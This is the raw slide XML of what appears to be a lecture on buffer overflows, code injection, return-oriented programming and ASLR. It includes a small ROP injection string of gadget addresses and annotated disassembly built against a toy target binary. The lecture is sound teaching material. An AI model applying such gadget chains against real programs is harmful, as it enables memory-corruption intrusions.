          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="3416300" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0x400606: 40 00 E8	add %bpl, %al</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0x400609: C3	ret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TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{848716C0-C257-7A40-BF8B-C896E46977AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6773524" y="2029326"/>
            <a:ext cx="2283510" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -d has-target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rounded Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19739C5C-2F43-E340-8542-F587B729873E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2398658"/>
            <a:ext cx="8218834" cy="15124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86165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ROP Injection String</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Content Placeholder 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{936C265C-A07A-2641-ABE8-067EED7C1322}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sometimes have to be circuitous</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example, to place 'B' in %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a: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D2E7A7AC-D85D-0545-A8A4-8939FA6AA91A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="184525" y="2854387"/>
            <a:ext cx="7393708" cy="256098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fill buffer &amp; padding */</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 start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> addresses */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>65 06 40 00 00 00 00 00 // mov $0x0, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; add $0x8,%rsp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 00 00 00 00 00 00 00 // filler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>68 05 40 00 00 00 00 00 // pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rbp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42 00 00 00 00 00 00 00 // value to be placed in %al</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>06 60 40 00 00 00 00 00 // add %bpl, %al</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"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4BA998DD-E4F3-5546-A888-78C9EF322CD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7762760" y="2854387"/>
            <a:ext cx="4213187" cy="12136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400568:   5d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  400569:   c3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"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3FBA2248-BF93-574A-8AE1-27E6F5FE4780}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7762760" y="4624892"/>
            <a:ext cx="4307066" cy="12136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400603:   bf 4f 07 40 00</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"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8E326C6F-A8E5-6E4F-AD75-B6CE99F18798}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7762759" y="1083882"/>
            <a:ext cx="4213187" cy="12136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400665:   b8 00 00 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  40066a:   48 83 c4 08</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  40066e:   c3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{334B9388-7483-9B4B-B905-D52A2EE0DEDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1630017" y="1411756"/>
            <a:ext cx="6523383" cy="2583756"/>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F196B0-C1B3-7C48-8A31-195E089EDACE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1457739" y="1870076"/>
            <a:ext cx="6589642" cy="2573587"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="162A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ECE7EF-0476-6947-9772-750A8736AA1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1630017" y="3326256"/>
            <a:ext cx="6523383" cy="1178032"/>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14F3C9-A166-2442-9218-D91DA4BAA3FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1457739" y="3537667"/>
            <a:ext cx="6695662" cy="1438198"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="162A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D9126A-DDCF-284D-9299-8AE32164E162}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1630016" y="5042144"/>
            <a:ext cx="6438902" cy="54617"/>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BB3F7F2-27A5-694C-B5EE-09DCACBA92E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1457739" y="5246194"/>
            <a:ext cx="6611180" cy="83155"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="162A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59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par>
                                <p:cTn id="13" presetID="22" presetClass="exit" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(left)">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xit" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(right)">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par>
                                <p:cTn id="28" presetID="22" presetClass="exit" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(left)">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xit" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(right)">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par>
                                <p:cTn id="43" presetID="22" presetClass="exit" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(left)">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0E7F-81BA-7440-BCF7-8EA119169612}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365125"/>
            <a:ext cx="10928420" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>System-Level Protections</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3. Address Space Layout Randomization (ASLR)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DA9A032-BC16-204B-85A7-C365866F1C90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Randomize addresses of functions in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If function addresses are unknown, gadget locations are unknown</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{154B7E67-F2DA-3F41-A8F7-E91D23D0214F}"/>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AC12623A-F921-B142-B7D0-A13E71BE1290}"/>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6" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{562682D3-FF5C-0544-913B-512F7103E25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73583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28674"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Buffer Overflow possible due to unbounded inputs being placed in arrays that lack bounds checking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Code injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Place instructions on stack, overwrite return address to start of new instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Return-oriented programming</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Find gadgets with the desired instructions, place gadget addresses on stack to be used by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Some defenses controlled by programmer, some by compiler, some by OS &amp; hardware</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07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Refresher on Memory Layout:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>non-const strings typically on stack</a:t>
            </a:r>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="Group 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF797714-2079-F342-BAEF-5A25579E3B3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6787588" y="455730"/>
            <a:ext cx="3646024" cy="5914133"/>
            <a:chOff x="6588078" y="451413"/>
            <a:chExt cx="3646024" cy="5914133"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Rectangle 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7ADE7B75-2ACC-E446-98E0-CC155B00DDE9}"/>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2FDA9CBE-0304-674D-A4BF-47844C23A952}"/>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3" name="Rectangle 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B51FFDEB-142D-4048-AB62-03F91861278D}"/>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9CDB88D6-8825-624C-9CC6-243A712B8E96}"/>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7" name="Rectangle 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4F9C852-A40C-3F4A-A73F-4436081AA8B0}"/>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8" name="TextBox 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20526AB4-325F-D947-8B47-B893D418BA9A}"/>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9" name="Straight Arrow Connector 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E45171E-3542-2243-9013-94D493C218BF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="2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30" name="Rounded Rectangle 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99034B6A-A3B1-8D40-85FA-6EDFB5AF8818}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1357910" y="3429000"/>
            <a:ext cx="4313819" cy="150832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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="46" name="Group 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E15DD4C-7268-754C-9FCC-9C681BD03007}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8959448" y="5147021"/>
            <a:ext cx="1469984" cy="467508"/>
            <a:chOff x="9124092" y="5147021"/>
            <a:chExt cx="1305340" cy="467508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Rectangle 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2B5AD63-9698-8345-8EF5-F06B4C410ED5}"/>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5CEF56-D859-A046-BDC2-3F764DD67571}"/>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E8B5D9-F529-BD4F-9FE7-DC4C0792531C}"/>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FA7514C-5D6A-6A48-8066-66D24089C1B8}"/>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353EF3D-3276-644B-B512-FF171672A530}"/>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C1D1025-0578-C248-AB42-72F3C6CAE7B3}"/>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8EA8134-1708-E64C-8062-980005B17BCA}"/>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F2304F0-BD9F-B04F-9658-1645F8AD034F}"/>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D2D5A87B-59B8-F64C-8F7A-265A48F0E0FF}"/>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40" name="Straight Arrow Connector 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5650260-FC83-FC46-9F2D-1B876EA3DB3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="39"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5D5C8548-B61B-9242-A9CC-92BEC86388C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1401201" y="3986008"/>
            <a:ext cx="6090651" cy="1210083"/>
            <a:chOff x="6147900" y="3783723"/>
            <a:chExt cx="6090651" cy="1210083"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="Oval 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0567E3E-81E7-AA4F-8964-D8133232A3BD}"/>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5B43A985-102E-5D42-9252-90BBE6E46639}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="44" idx="6"/>
              <a:endCxn id="39" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8891100" y="4011022"/>
              <a:ext cx="3347451" cy="982784"/>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10975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0BA685-E4B7-FD4F-BBC6-2E73C247794D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Content Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46F11E69-3A0A-7046-9271-0E9F91ACF1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9339" y="2398643"/>
            <a:ext cx="10413322" cy="3205302"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{311B1E2E-CBAB-DB4B-88AB-5232C0772C17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8987027" y="5624513"/>
            <a:ext cx="2315634" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://xkcd.com/327/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="377248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BCEC44-FC52-FF42-830D-001EDFA6FF1E}"/>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4C4A10F6-AEB6-5445-8B38-6F4B34C9B3D0}"/>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6" name="Title 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F8478B1-4538-8C43-84C3-DF07D6BF8A5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buffer Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B26C84A-86F8-064E-A6F5-4054C3FB8A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886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i="1" dirty="0"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> a Buffer Overflow?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> discussion</a:t>
